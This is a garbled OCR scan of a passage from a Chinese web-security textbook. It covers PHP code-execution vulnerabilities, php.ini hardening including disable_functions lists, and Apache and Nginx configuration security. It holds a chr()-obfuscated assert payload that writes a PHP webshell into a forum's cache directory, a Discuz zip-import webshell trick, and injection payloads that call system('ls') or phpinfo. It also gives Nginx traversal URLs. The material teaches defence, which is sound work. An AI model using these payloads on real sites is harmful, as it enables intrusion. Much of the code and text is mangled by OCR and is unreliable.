得 eval0 得 以 执行 ， 唯 一 需要 处 理 的 是 一 些 敏 感 字符 。 
flyh4t 给 出 了 如 下 POC: 


在 后 台 Home -> Template Sets -> Default Templates 选择 Edit Template: 
index 


在 {$headerinclude} 下 写 入 如 下 一 段 代 码 后 保存 : 


($(assert(chr(102).chr(112).chr(117).chr(116) 
.chr(115).chr(40).chr(102).chr(111).chr( 
112).chr(101).chr(110).chr(40).chr(39).chr(99 
).chr(97).chr(99).chr(104).chr(101).chr( 
47).chr(102).chr(108).chr(121).chr(104).chr(5 
2).chr(116).chr(46).chr(112).chr(104).ch 
r(112).chr(39).chr(44).chr(39).chr(119).chr(3 
9).chr(41).chr(44).chr(39).chr(60).chr(6 
3).chr(112).chr(104).chr(112).chr(32).chr(64) 
.chr(36).chr(95).chr(80).chr(79).chr(83) 
.chr(84).chr(91).chr(119).chr(93).chr(40).chr 
(36).chr(95).chr(80).chr(79).chr(83).chr 
(84).chr(91).chr(102).chr(93).chr(41).chr(63) 
.chr(62).chr(39).chr(41).chr(59) )}} 


Wi BE SUs 将 在 cache 目录 下 生成 flyh4t.php， 内 容 为 

个 案例 清晰 地 展示 了 如 何 从 “找到 敏感 机 数 eval0” 到 “成 为 一 ARES 
SURO 。 虽然 这 个 漏洞 要 求 具 备 应 人 编辑 
模板 ， 但 是 攻击 者 可 能 会 通过 XSS 或 其 他 手段 来 完成 这 一 点 


14.3.2“ 文 件 写 入 ”执行 代码 

在 PHP 中 对 文件 的 操作 一 定 要 谨慎 ， 如 采 文 件 操作 的 内 容 用 户 可 以 控 
制 ， 则 也 极 容 易 成 为 漏洞 。 

T H 这 个 Discuz! admin\database.inc.phpget-webshell bug FH ring04h 发 
7 o 

在 database.inc.php 导 入 zip 文 件 时 ， 存 在 写 文 件 操作 ， 但 其 对 安全 的 判 
呆 过 于 人 简单， 导致 用 户 可 以 将 此 文件 内 容 修改 为 PHP 代 码 : 


elseif($operation == 'importzip') { 
require once DISCUZ ROOT.'admin/ 
zip.func.php'; 
$unzip - new SimpleUnzip(); 
$unzip->ReadFile($datafile_ real a 


if($unzip->Count() == 0 || $unzip- 
»GetError(0) != 0 || !preg i natch(^ '/N.sgl$/i", 
$importfile = $unzip->GetName(0))) { 
cpmsg('database import file illegal', 
5*5, “error! )3 


$identify = explode(', 
base64 uen pue MT '/^# Identify: 


NS* (Nw*).* 
PANTY substrtsunzap- >GetData(0), LO 
$confirm = = lempty($confirm) ? 


if(!$confirm && $identify[1] i 
$version) ( 
cpmsg('database import confirm', 
'admincp.php?action-database&operation- 
importzip&datafile server- 
$datafile_server&importsubmit=yes&confirm=yes 


'form'); 


$sqlfilecount = 0; 
foreach($unzip->Entries as $entry) { 


if(preg match("/N.sql$/i", $entry- 
>Name)) { 
$fp = eds ./fo rumda ta/' 
$backupdir.'/'.$entry->Name, 'w' 
fwri ie(sip $entr ry- >Data a); 
fclose($fp); 
$sqlfilecount+ 


最 后 有 fwrite() 写 文件 操作 。 同 时 注意 : 


preg_match("/\.sql$/i", $importfile = $unzip- 
>GetName(0) ) 


EE HCE BBA .sql， 但 是 其 检查 并 不 充分 ， 攻 击 者 可 以 利用 
Apache 的 文件 名 解析 特性 《参考 “文件 上 传 漏洞 ”一 章 ) ， 构 造 文件 名 
为 : 081127_k4pFUs3C-1.php.sql。 此 文件 名 在 Apache 下 默认 会 作为 
PHP 文 件 解析 ， 从 而 获得 代码 执行 。 

BNEPOC: 


=i HREAN vu 
jh zips tsubmit=yes&frames=yes 


14.3.3 ”其 他 执行 代码 方式 

通过 上 面 的 几 个 真实 案例 ， 让 我 们 对 PHP 中 代码 执行 漏洞 的 复杂 性 有 
了 初步 的 了 解 。 如 果 对 第 见 的 代码 执行 调 洞 进行 分 类 ， 则 可 以 总 结 
一 些 规 律 。 兄 悉 并 理解 这 些 可 能 导致 代码 执行 的 情况 ， 对 于 代码 审核 
及 安全 方案 的 设计 有 着 积极 意义 。 

直接 执行 代码 的 函数 

PHP 中 有 不 少 可 以 直接 执行 代码 的 函数 ， 比 如 : eval() ^ assert() ^ 
system() ^ exec() ^ shell exec() ^ passthru(jescapeshellcmd() ` 
xu dd o 


?p 
vale cho $foobar;'); 


gc He FTE PHP HR EIUS ERI o TE Ca LSU ara 
RB P AERRGETEXUEENTA, Aa Behe, aA Pe 

可 以 控制 输入 。 

文件 包含 

文件 包含 漏洞 也 是 代码 注入 的 一 种 ， 需 要 融 度 关注 能 够 包含 文件 的 函 


4X: include() ^ ee ` require() ` require once() ° 


«?php 

$to include - $ GET['f e']; 

reqúire: ence (St o_inclu de . '.html1'); 
?> 


本 地 文件 写 入 


能 够 往 本 地 文件 里 写 入 内 容 的 函数 都 需要 重点 关注 。 

IEE KALE SS , HS DLA file_put_con-tents() ` fwrite() ` fputs() ° 
TEE FR LAS Y SS AAS SIG BUTE RU 。 

需要 注意 的 是 ， 写 入 文件 的 功能 可 以 和 文件 包含 、 和 危险 函数 执行 等 漏 
洞 结合 ， 最 终 使 得 原本 用 户 无 法 控制 的 输入 变 成 可 探 。 在 代码 审计 时 
要 注意 这 种 “组 合 类 ”漏洞 。 

preg_replace() 代 码 执行 

preg replace() 的 第 一 个 参数 如 果 存 在 /e 模 式 修 饰 符 ， 则 人 允许 代码 执 
Tes 


«?php 

$var = '«tag»phpinfo()«/tag»'; 

AN 
需要 注意 的 是 ， 即 便 第 一 个 参数 中 并 没有 /e 模 式 修 毁 符 ， 也 是 有 可 能 

一 N y. ` MA A .EL 站 a 

执行 代码 的 。 这 要 求 第 一 个 参数 中 包公 变量 ， 并 且 用 户 可 控 ， 有 可 能 
通过 注入 /e%00 的 方式 截断 文本 ， 注 入 一 个 “/e”。 

<?php 

$regexp = $ GET['re']; 


$var = '«tag»phpinfo()«/tag»'; 
preg_replace("/<tag>(.*?)$regexp<\/tag>/", 'N 
$var); 


针对 这 段 代码 ， 可 以 通过 如 下 方式 注入 : 


当 preg_replace0 的 第 一 个 参数 中 包含 了 /e 时 ， 用 户 无 论 是 控制 了 第 二 
个 参数 还 是 第 三 个 参数 ， 都 可 以 导致 代码 执行 。 

动态 函数 执行 

用 户 目 定义 的 动态 函数 可 以 导致 代码 执行 ， 需 要 注意 这 种 情况 。 


«?php 
$dyn func - $ GET['dyn func']; 
= ET['argument']; 


$argul 
$dyn_func($argument ) ; 
2 


这 种 写法 近似 于 后 门 ， 将 直接 导致 代码 执行 ， 比 如 


SIA, create function ERZ to H. & CBE 


«?php 
$foobar - $ GET['foobar']; 
$dyn func = create function('$foobar', "echo 


$dyn func(''); 
5 


攻击 payload 如 下 : 


http://www.example.com/index.php? 
foobarzsystem('ls') 


Curly Syntax 


PHP 的 Curly Syntax 也 能 导致 代码 执行 ， 它 将 执行 花 括 号 间 的 代码 ， 


将 结 采 替换 回去 ， 如 下 例 : 


<?php 

$var = "I was innocent until ${`ls`} 
appeared here"; 

?> 


ls 命令 将 列 出 本 地 目录 的 文件 ， 并 将 结果 返回 。 
如 下 例 ，phpinfo() 函 数 将 执行 : 


<?php 

$foobar = 'phpinfo'; 
${'foobar'}(); 

?> 


回调 函数 执行 代码 


很 多 函数 都 可 以 执行 回调 函数 ， 当 回调 函数 用 户 可 控 时 ， 将 导致 代码 


和 一 
执行 。 
«?ph 
$evil callback - $ GET['callback']; 
$some array - array(0, 1, 2, ; 
$new array = array map($evil callback, 
$some array); 
?» 


攻击 payload 如 下 : 


http://www.example.com/index.php? 
callback-phpinfo 


此 类 画 数 很 多 ， 下 面 列 出 一 些 可 以 执行 call-back 参 数 的 函数 。 


array_map() 

usort(), uasort(), uksort() 
array_filter() 

array_reduce() 

array diff uassoc(), array diff ukey() 
array udiff(), array udiff assoc(), 
array udiff uassoc() 

array intersect assoc(), 

array intersect uassoc() 

array uintersect(), 

array uintersect assoc(), 

array uintersect uassoc() 

array walk(), array walk recursive() 
xml set character data handler() 

xml set default handler() 

xml set element handler() 

xml set end namespace decl handler() 
xml set external entity ref handler() 
xml set notation decl handler() 

xml set processing instruction handler() 
xml set start namespace decl handler() 
xml set unparsed entity decl handler() 
stream filter register() 

set error handler( 

register shutdown function() 
register tick function() 


ob_start(0 实 际 上 也 可 以 执行 回调 函数 ， 需 要 特别 注意 。 


«?php 

$foobar - 'system'; 
ob start($foobar); 
echo 'uname'; 

ob end flush(); 

?» 


unserialize) = 8f R3 AUT 


unserialize(0) 这 个 函数 也 很 常见 ， 它 能 将 序列 化 的 数据 重新 映射 为 PHP 
变量 。 但 是 unserialize0 在 执行 时 如 果 定 义 了 destruct0 画 数 ， 或 者 是 
wakeup0 函 数 ， 则 这 两 个 函数 将 执行 。 

unserialize f RHA 了 有 两 个 条 件 ， 一 是 unse-rialize0 的 参数 用 户 可 以 控 
制 ， 这 样 可 以 构造 出 需要 反 序 列 化 的 数据 结构 ， 二 是 存在 destruct() ER 
0 EXC, X PT ER CSS ELIJA 罗 辑 决定 了 能 执行 什么 样 的 
攻击 者 可 以 通过 unserialize() 控 制 destruct0 或 wakeup0O 中 函数 的 输入 。 
参考 下 面 的 例子 : 


class Exa pai 5 
va 


x 
Ve var); 


unserialize($ GET['saved code']); 
> 


Akpa load FP: 


Rs d E ore d 
ved code- "i4: 


(Sid VAR 110: "phpin nfo( i 
"il 


攻击 payload 可 以 先 模 仿 目 标 代 码 的 实现 过 程 ， 然 后 再 通过 调用 
serialize()ik t# ° 
以 上 为 一 些 主要 的 导致 PHP 代 码 执行 的 方法 ， 在 代码 审计 时 需要 重点 
FETA EMT © 


14.4 ”定制 安全 的 PHP 环 境 

在 本 章 中 ， 我 们 已 经 深入 了 解 了 PHP 语 言 的 灵活 性 ， 以 及 PHP 安 全 问题 
的 隐 菩 性， 那么 要 如 何 做 好 PHP 的 安全 呢 ? 

a 了 熟悉 各 种 PHP 漏 洞 外 ， 还 可 以 通过 配置 php.ini 来 加 固 PHP 的 运行 环 
B 


PHP 官 方 也 曾经 多 次 修改 php.ini 的 默认 设置 。 在 本 书 中 ， 推 荐 php.ini 中 
一 些 安全 相关 参数 的 配置 。 
register globals 


“register_globals = ON 时 ，PHP 不 知道 变量 从 何 而 来 ， 也 容易 出 现 一 些 
变量 履 盖 的 问题 。 因 此 从 最 佳 实践 的 角度 ， 强 烈 建议 设置 
register_globals= OFF， 这 也 是 PHP 新 版 本 中 的 默认 设置 。 

open basedir 

open_basedir 可 以 限制 PHP 只 能 控 作 指定 目录 下 的 文件 。 这 在 对 抗 文件 
包含 、 目 录 人 壳 历 等 攻击 时 非常 有 用 。 我 们 应 该 为 此 选项 设置 一 个 值 。 
需要 注意 的 是 ， 如 果 设 置 的 值 是 一 个 指定 的 目录 ， 则 需要 在 目录 最 后 
加 上 一 个 %*， 否 则 会 税 认 为 是 目录 的 前 级 。 


open basedir = /home/web/html/ 
allow url include 


为 了 对 抗 远 程 文件 包含 ， 请 关闭 此 选项 ， 一 般 应 用 也 用 不 到 此 选项 。 
同时 推荐 关闭 的 还 有 al-low_url_fopen。 


url_ 
| url include = Off 
display errors 


普 误 回 显 ， 一 般 常 用 于 开发 模式 ， 但 是 很 多 应 用 在 正式 环境 中 也 起 记 
了 关闭 此 远 项 。 错 误 回 显 可 以 峻 露出 非 稼 多 的 敏感 信息 ， 为 攻击 着 下 
一 步 攻击 提供 便利 。 推 荐 关闭 此 选项 。 


display errors = Off 
g 


在 正式 环境 下 用 这 个 就 行 了 ， 把 错误 信息 记录 在 日 志 里 。 正 好 可 以 关 
闭 错 误 回 显 。 


推荐 关闭 ， 它 并 不 值得 依赖 (请 参考 “注入 攻击 ”一 章 ) ， 已 知已 经 有 
若干 种 方法 可 以 绕 过 它 ， 甚 至 由 于 它 的 存在 反而 衍生 出 一 些 新 的 安全 
问题 。XSS、SQL 注 入 等 漏洞 ， 都 应 该 由 应 用 在 正确 的 地 方 解 决 。 同 时 
关闭 它 还 能 提高 性 能 。 


magic quotes gpc = OFF 
cgi.fix pathinfo 


大 PHP 以 CGI 的 方式 安装 ， 则 需要 关闭 此 项 ， 以 避免 出 现 文 件 解 析 问 题 
(请 参考 “文件 上 传 漏洞 ”一 章 ) 。 


开启 HttpOnly (HttpOnly 的 作用 请 参考 < 跨 站 脚本 攻击 ”一 章 ) 。 


若是 全 站 HTTPS 则 请 开启 此 项 。 


session.cookie secure 


safe mode 

PHP 的 安全 模式 是 否 应 该 开启 的 争议 一 直 比 较 大 。 一 方面 ， 它 会 影响 很 
多 函数 ， 男 一 方面 ， 它 义 不 停 地 被 黑客 们 绕 过 ， 因 此 很 难 取舍 。 如 果 
是 共享 环境 (比如 App Engine) ， 则 建议 开启 safe mode， 可 以 和 
disable_functions 配 合 使 用 ;， 如 果 是 单独 的 应 用 环境 ， 则 可 以 考虑 关闭 
它 ， 更 多 地 依赖 于 disable_functions 控 制 运行 环境 安全 。 


safe_mode 在 当前 的 PHP 版 本 中 会 影响 以 下 函数 。 


dbmopen() 检查 被 操作 的 文件 或 目录 是 个 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
dbase open() 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
检查 被 操作 的 文件 或 目录 是 从 与 被 执行 的 时 本 有 相同 的 UID( 押 有 者 ) 


filepro rowcount() APE BERLE RC FEAR ache P CATULL]. UID( 所 有 者 ) 
filepro retrieve() 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 周 本 有 相同 的 UID( 所 有 者 ) 
sq safe mode 限制 (= safe mode) 


sql_ safe mode 限制 (= safe mode) 
sql safe mode 限制 (= safe mode) 
pe loimport) 检查 被 操作 的 文件 或 目录 是 玫 与 被 执行 的 脚本 有 相同 的 UDAZ) 


续 表 


安全 模式 限制 函数 
EE 
posix mkfifo() 检查 被 操作 的 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID (所 有 者 ) 


遵循 ini 设置 的 safe mode protected env vars 和 safe mode allowed_ 
env vars 选项 。 请 参考 putenv() 函数 的 有 关 文 档 
move uploaded file() 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
chdir() 检查 被 操作 的 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID (所 有 者 ) 
dio "i PHP 运行 在 安全 模式 时 ， 不 能 使 用 此 函数 
backtick operator 当 PHP 运行 在 安全 模式 时 ， 不 能 使 用 此 函数 
shell exec() (在 功能 上 和 backticks 函数 相同 ) "4 PHP 运行 在 安全 模式 时 ， 不 能 使 用 此 函数 
只 能 在 safe mode exec dir 设置 的 目录 下 进行 执行 操作 。 基 于 某 些 原 
exec() 因 ， 目 前 不 能 在 可 执行 对 象 的 路 径 中 使 用 ..。escapeshellicmd0 将 被 作用 于 
此 函数 的 参数 上 
只 能 在 safe mode exec dir 设置 的 目录 下 进行 执行 操作 。 基 于 某 些 原 
system() 因 , 目前 不 能 在 可 执行 对 象 的 路 径 中 使 用 ..。escapeshellcmd0 将 被 作用 于 
此 函数 的 参数 上 
只 能 在 safe mode exec dir 设置 的 目录 下 进行 执行 操作 。 基 于 某 些 原 
因 ， 目 前 不 能 在 可 执行 对 象 的 路 径 中 使 用 ..。escapeshellcmd0 将 被 作用 于 
此 函数 的 参数 上 
只 能 在 safe mode exec dir 设置 的 目录 下 进行 执行 操作 。 基 于 某 些 原 
popen() 因 ， 目 前 不 能 在 可 执行 对 象 的 路 径 中 使 用 ..。escapeshellcnd0 将 被 作用 于 
此 函数 的 参数 上 
fopen() 检查 被 操作 的 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID 〈 所 有 者 ) 
mkdir() 检查 被 操作 的 目录 是 杏 与 被 执行 的 脚本 有 相同 的 UID (所 有 者 ) 
rmdir() 检查 被 操作 的 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID. (所 有 者 ) 
rename() 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
unlink() 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
copyO 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
chgrpO 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 》 
chown() 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
另外 ， 不 能 设置 SUID、SGID 和 sticky bits 
touch() 检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
GER: {Wik target) 
检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
GER: 仅 测 试 target) 
在 安全 模式 下 ， 以 “authorization” (区 分 大 小 写 ) 开头 的 标 头 将 不 会 
被 返回 
在 安全 模式 下 , 如 果 设 置 了 WWNW-Authenticate, 则 当前 脚本 的 UID 将 
被 添加 到 该 标 头 的 realm 部 分 


putenv() 


chmod() 


symlink() 


apache request headers() 


EE: 限 A 

在 安全 模式 下 ， 变 量 PHP AUTH USER, PHP AUTH PW 和 PHP 
AUTH TYPE 在 $ SERVER 中 不 可 用 。 但 无 论 如 何 ， 您 仍然 可 以 使 
H REMOTE USER 来 获取 用 户 名 称 《USER) 《注意 ， 仅 在 PHP 430 
版 本 后 有 效 ) 

检查 被 操作 的 文件 或 目录 是 从 与 被 执行 的 脚本 有 相同 的 UID( 所 有 者 ) 
(HERG: (UE 4.2.1 版 本 后 有 效 ) 

检查 被 操作 的 文件 或 目录 是 否 与 被 执行 的 周 本 有 相同 的 UTD( 所 有 者 ) 
(HER: DUE 42.1 版 本 后 有 效 ) 
set time limit) 在 安全 模式 下 不 起 作用 
max execution time 在 安全 模式 下 不 起 作用 

在 安全 模式 下 ,第 5 个 参数 被 习 赦 。 (注意 ， 仅 从 PHP 4.2.3 版 本 起 受 
影响) 
需要 特别 注意 的 是 ， 如 果 开 启 了 safe mode, Jllexec() ^ system() ^ 
passthru() ^ popen) 等 函数 并 非 被 禁用 ， 而 是 只 能 执行 
在 “safe_mode_exec_dir” 所 指定 目录 下 存在 的 可 执行 文件 。 如 果 要 人 允许 
po 则 请 设置 好 safe_ mode_exec_dir 的 值 并 将 此 目录 设置 为 不 可 
safe_mode 被 绕 过 的 情况 ， 往 往 是 因为 加 载 了 一 些 非 官方 的 PHP 扩 展 。 


扩展 自 带 的 函数 可 以 绕 过 safe mode， 因 此 请 谨慎 加 载 非 默 认 开 启 的 
PHP 扩 展 ， 除 非 能 确认 它们 是 安全 的 。 


disable functions 


highlight file() show source() 


parse ini file() 


disable functionsBE 8e E PHP F Z5 Fl aX o iot ze 360007] a), SE FH ER CRT 
能 会 为 开发 带 来 不 便 ， 但 禁用 的 函数 太 少 又 可 能 增加 开发 写 出 不 安全 
代码 的 几率 ， 同 时 为 黑客 获取 webshell 提 供 便利 。 

一 般 来 说 ， 如 果 是 独立 的 应 用 环境 ， 则 推荐 禁用 以 下 函数 : 

disable functions =  escapeshellarg, es-capeshellcmd， exec, passthru, 
proc_close,proc_get_status, proc open, proc nice, proc ter-minate, 
shell exec, system, ini restore, popen, dl,disk free space, diskfreespace, 
set time limit,tmpfile, fopen, readfile, fpassthru, fsockopen,mail, ini alter, 


highlight file, openlog,show. source, symlink, 
apache child terminate,apache get modules, 
apache get version,apache getenv, apache note, 


apache setenv,parse ini file 

如 果 是 共享 环境 (比如 App Engine) ， 则 需要 禁用 更 多 的 函数 。 这 方面 
可 以 参考 新 浪 推 出 的 SAE 平 台 ， 在 共享 的 PHP 环 境 下 ， 禁 用 的 函数 列表 
Al: 

禁用 的 函数 : 
php_real_logo_guid,php_egg logo guid,php ini scanned files,php_ini_loa 
ded file,read-link,linkinfo,symlink,link,exec,system,es- 
capeshellcmd,escapeshellarg,passthru,shell exec,proc open,proc close,proc 
 terminate,proc get status,proc nice,getmyuid,getmygid,getmyin- 
ode,putenv,getopt,sys getloadavg,getrusage,get current user,magic quotes - 
runtime,set magic quotes runtime,import request variables,de- 

bug zval dump,ini alter,dl,pclose,popen,stream select,stream filter prepen 
d,stream filter ap- 

pend,stream filter remove,stream socket client,stream socket. server,strea 
m socket ac- 

cept,estream socket get name,stream socket recvfrom,stream socket sendt 
O,stream socket. en- 

able crypto,stream socket shutdown,stream socket. pair,stream copy. to st 
ream,stream get con- 

tents,stream set write buffer,et file bufferset socket blocking,stream set 
 blocking,socket set blocking,stream get meta data,stream get line,strea 
m register wrapper,stream wrapper re- 
store,stream get. transports,stream is lo- 

cal,get headers,stream set timeout,socket get status,mail,openlog,syslog,cl 
oselog,apc add,apc cache info,apc clear cache,apc compile file,apc defi 


ne constants,apc delete,apc load con- 

stants,apc sma info,apc store,flock,pfsock- 

open,posix kill,Iaapache child termi- 
nate,apache get modules,apache get ver- 

sion,apache getenv,apache lookup uri,apache reset timeout,apache respon 
se head-ers,apache setenv,virtualomysql pconnect,omem- 

cache add server,memcache connect,mem-cache pconnect 

禁用 的 类 : 

XMLWriter, DOMDocument, DOMNota- 

tion, DOMX Path, SQLiteDatabase,SQLiteRe- 

sult, SQLiteUnbuffered,SQLiteException 

对 于 PHP 6 来 说 ， 安 全 架构 发 生 了 极 大 的 变化 ，magic_quotes_gpc、 
safe_mode 等 都 已 经 取消 ， 同 时 提供 了 一 些 新 的 安全 功能 。 由 于 PHP 6 
离 普 及 尚 有 很 长 一 段 时 间 ， 很 多 功能 尚未 稳定 ， 在 此 暂 不 讨论 。 


145 小 结 

在 本 章 中 介绍 了 PHP 安 全 相关 的 很 多 问题 。PHP 是 一 门 被 广泛 使 用 的 
Web 开 发 语言 ， 它 的 语法 和 使 用 方式 非常 灵活 ， 这 也 导致 了 了 PHP 代码 
安全 评估 的 难度 相对 较 高 。 

本 章 先 后 介绍 了 PHP 中 一 些 特别 的 安全 问题 ， 比 如 文件 包含 漏洞 、 代 
码 执行 漏 润 ， 最 终 对 如 何 定 制 一 个 安全 的 PHP 环 境 给 出 了 建议 。 根 据 
本 章 的 一 些 最 佳 实践 ， 可 以 为 PHP 安 全 评估 提供 参考 和 指导 思想 。 


第 15 章 ”Web Server 配 置 安全 


Web 服 务 器 是 web 应 用 的 载体 ， 如 果 这 个 载体 出 现 安全 问题 ， 那 么 运 
行 在 其 中 的 Web 应 用 程序 的 安全 也 无 法 得 到 保障 。 因 此 Web 服 务 絮 的 
安全 不 容 忽视 。Web 服 务 器 安全 ， 考 虑 的 是 应 用 布 署 时 的 运行 环境 安 
全 。 这 个 运行 环境 包括 Web Server、 脚 本 语言 解释 器 、 中 间 件 等 软 
件 ， 这 些 软 件 所 提供 的 一 些 配 置 参 数 ， 也 可 以 起 到 安全 保护 的 作用 。 
本 章 将 抛砖引玉 ， 讲 讲 Web 服 务 絮 有 哪些 常见 的 运行 时 安全 问题 ， 虽 
深 开 个 能 概括 所 有 的 问题 ， 但 却 是 历年 来 导致 安全 事件 最 多 的 一 些 问 
E 


ES 


15.1 Apache 安全 
尽管 近年 来 Nginx、LightHttpd 等 WebServer 的 市 场 份额 增长 得 很 快 ， 但 
Apache 仍 然 是 这 个 领域 中 独一无二 的 巨 尖 ， 互 联网 上 大 多 数 的 Web 应 
用 依然 跑 在 Apache Httpd 上 。 本章 就 完 从 Apache 讲 起 ， 因 为 Apache 最 
具有 代表 性 ， 其 他 的 Web Server 所 面临 的 安全 问题 也 可 依 此 类 推 。 在 
本 章 中 ，Apache 均 代 指 Apache Httpd ° 
Web Server 的 安全 我 们 关注 两 点 : 一 是 WebServer 本 里 是 否 安 全 ; 二 是 
Web Server 是 否 提供 了 可 使 用 的 安全 功能 。 纵 观 Apache 的 漏洞 史 ， 它 
曾经 出 现 过 许多 次 高 危 漏 洞 。 但 这 些 高 危 漏 洞 ， 大 部 分 是 由 Apache 的 
Module 造 成 的 ，Apache 核 心 的 高 危 漏 洞 几 乎 没有 。Apache 有 很 多 官方 
与 非 官 方 的 Module， 默 认 启 动 的 Module 出 现 过 的 高 危 涯 润 非常 少 ， 大 
多 数 的 高 危 漏 洞 集 中 在 默认 没有 安装 或 enable 的 Module 上 。 
因此 ， 检 查 Apache 安 全 的 第 一 件 事 情 ， 束 是 检查 Apache 的 Module 安 装 
情况 ， 根 据 “ 最 小 权限 原则 ”， 应 该 尽 可 能 地 减少 不 必要 的 Module， 对 
于 要 使 用 的 Module， 则 检查 其 对 应 版 本 是 否 存在 已 知 的 安全 漏洞 。 
定制 好 了 Apache 的 安装 包 后 ， 接 下 来 需要 做 的 ， 就 是 指定 Apache 进 程 
以 单独 的 用 户 喘 份 运行 ， 这 通常 需要 为 Apache 单 独 建 立 一 个 
user/group ? 
fa Zeit az, ApacheLlrootH (2X admin (3811 x& — T 3E TELS 
WYRE ° X E admin (5 ze 18 Bi 25 s s EE DTE et EE Las FN] fe FE NIE 
份 。 这 个 吴 份 的 权限 也 是 比较 高 的 ， 因 为 管理 员 有 操作 管理 脚本 、 访 
问 配置 文件 、 读 / 写 日 志 等 需求 。 
使 用 高 权限 号 份 运行 Apache 的 结果 可 能 是 灾难 性 的 ， 它 会 带 来 两 个 可 
怕 的 后 果 : 

(1) 当 黑 客 入 侵 Web 成 功 时 ， 将 直接 获得 一 个 高 权限 (比如 root 或 
admin) 的 shell; 

(2) 应 用 程序 本 和 号 将 具备 较 高 权限 ， 当 出 现 bug 时 ， 可 能 会 带 来 较 高 
风险 ， 比 如 删除 本 地 重要 文件 、 杀 死 进程 等 不 可 预知 的 结果 。 
比较 好 的 做 法 是 使 用 专门 的 用 户 号 份 运行 Apache， 这 个 用 户 续 份 不 应 
该 具备 shell， 它 唯一 的 作用 束 是 用 来 运行 Web 应 用 。 
以 什么 号 份 启动 进程 ， 在 使 用 其 他 Web 容 絮 时 也 需要 注意 这 个 问题 。 
很 多 JSP 网 站 的 管理 员 喜 欢 将 Tomcat 配 置 为 root 号 份 运行 ， 导 致 的 后 果 
了 webshell 后 ， 发 现 这 个 webshell 已 经 具备 
rootftx 耻 了。 


Apache 还 提供 了 一 些 配置 参数 ， 可 以 用 来 优化 服务 需 的 性 能 ， 提 高 对 
抗 DDOS 攻 击 的 能 力 。 我 们 曾 在 “应 用 层 拒绝 服务 攻击 ”一 章 中 所 到 过 


这 些 参数 : 


eT a d ie 
D H- H- H- H 


在 Apache 的 官方 文档 中 ， 对 如 何 使 用 这 些 参数 给 出 了 指导 。 这 些 参数 
能 够 起 到 一 定 的 作用 ， 但 单 台 机 需 的 性 能 毕 竞 有限， 所 以 对 抗 DDOS 
不 可 依赖 于 这 些 参数 ， 但 聊 胜 于 无 。 

最 后 ， 要 保护 好 Apache Log。 一般 来 说 ， 攻 击 者 入 侵 成 功 后 ， 要 做 的 
第 一 件 事 情 丈 是 清除 入 侵 痕 迹 ， 人 修改、 删除 日 志文 件 ， 因 此 access log 
应 当 受 图 保管 ， 比 如 实时 地 发 送 到 远程 的 syslog 服 务 右 上 。 


15.2 Nginx 安 全 

近年 来 Nginx 发 展 很 快 ， 它 的 高 性 能 和 高 并 发 的 处 理 能 力 使 得 用 户 在 
Web Server 的 选择 上 有 了 更 多 的 空间 。 但 从 安全 的 角度 来 看 ，Nginx 近 
年 来 出 现 的 影响 默认 安装 版 本 的 高 危 汤 洞 却 比 Apache 要 多 。 在 Nginx 
的 官方 网 站 有 这 些 安全 问题 的 列表 。Nginx 官 方 的 补丁 页 面 


nginx security advisories 


Igor Sysoev's PGP public key. 


* Vulnerabilities with invalid UTF-8 sequence on Windows 
Severity: major 
CVE-2010-2266 
Not vulnerable: 0.8.41-, 0.7.67+ 
Vulnerable: nginx/ Windows 0.7.52-0.8.40 


* Vulnerabilities with Windows file default stream 
Severity: major 
CVE-2010-2263 
Not vulnerable: 0.8.40-, 0.7.66+ 
Vulnerable: nginx/ Windows 0.7.52-0.8.39 


¢ Vulnerabilities with Windows 8.3 filename pseudonyms 
Severity: major 
CORE-2010-0121 
Not vulnerable: 0.8.33--, 0.7.65+ 
Vulnerable: nginx/Windows 0.7.52-0.8.32 


* Anerror log data are not sanitized 
Severity: none 
CVE-2009-4487 
Not vulnerable: none 
Vulnerable: all 


e The renegotiation vulnerability in SSL protocol 
Severity: major 
VU£120541 CVE-2009-3555 


11 —-^—^--. c—7.. 


a 3S ia ila], fh At mE f 


http://[ webserver IPIE; ppor IARE %CO./%CO. 
%CO./%CO .%CO. /%CO . 96 

http://[ webserver SL ty. %CO./%CO. 
96c0 . /96c0 .96cO . /%20 

http://[ webserver IP][:port]/96c0.96cO . /96cO . 
96c0 . /9620 


因此 多 多 关注 Nginx 的 漏洞 信息 ， 并 及 时 将 软件 升级 到 安全 的 版 本 ， 是 
非常 有 必要 的 一 件 事情 。 从 历史 的 经 验 来 看 ， 如 果 一 个 软件 出 现 的 漏 
洞 较 多 那么 说 明代 码 维 护 者 的 安全 意识 与 安全 经 验 有 所 人 欠缺， 同时 
由 于 破 窗 效应 ， 这 个 软件 未 来 往往 会 出 现 更 多 的 漏洞 。 

就 软件 安全 本 里 来 看 ，Nginx 与 Apache 最 大 的 区 别 在 于 ， 检 查 Apache 
安全 时 更 多 的 要 关注 Module 的 安全 ， 而 Nginx 则 需要 注意 软件 本 时 的 
安全 ， 及 时 升级 软件 版 本 。 

与 Apache 一 样 ，Nginx 也 应 该 以 单独 的 身份 运行 ， 这 是 所 有 Web 
Server、 容 器 软件 应 该 共同 遵守 的 原则 。 

